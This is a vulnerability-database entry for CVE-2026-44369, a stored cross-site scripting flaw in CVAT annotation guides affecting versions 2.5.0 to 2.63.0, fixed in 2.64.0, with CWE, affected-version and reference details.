CVE-2026-44369

UNKNOWN 0.0

CVAT: Stored XSS via annotation guides

CVSS Score

0.0

EPSS Score

0.0%

EPSS Percentile

0th

CVAT is an open source interactive video and image annotation tool for computer vision. From 2.5.0 to 2.63.0, an attacker who is able to create or edit an annotation guide on a task is able to add malicious JavaScript code, which will then run in the browser of anyone who opens this annotation guide. This code will be able to make arbitrary requests to CVAT with the victim user's privileges. This vulnerability is fixed in 2.64.0.

CWE	CWE-80
Vendor	cvat-ai
Product	cvat
Published	May 13, 2026

Stay Ahead of the Next One

Get instant alerts for cvat-ai cvat

Be the first to know when new unknown vulnerabilities affecting cvat-ai cvat are published — delivered to Slack, Telegram or Discord.

Get Free Alerts → Free · No credit card · 60 sec setup

Affected Versions

cvat-ai / cvat

>= 2.5.0, < 2.64.0

References

NVD ↗ CVE.org ↗ EPSS Data ↗

github.com: https://github.com/cvat-ai/cvat/security/advisories/GHSA-m2h7-6xqm-p9v5 github.com: https://github.com/cvat-ai/cvat/commit/ad9e90003d8234ac7602598b109dc11450321dfc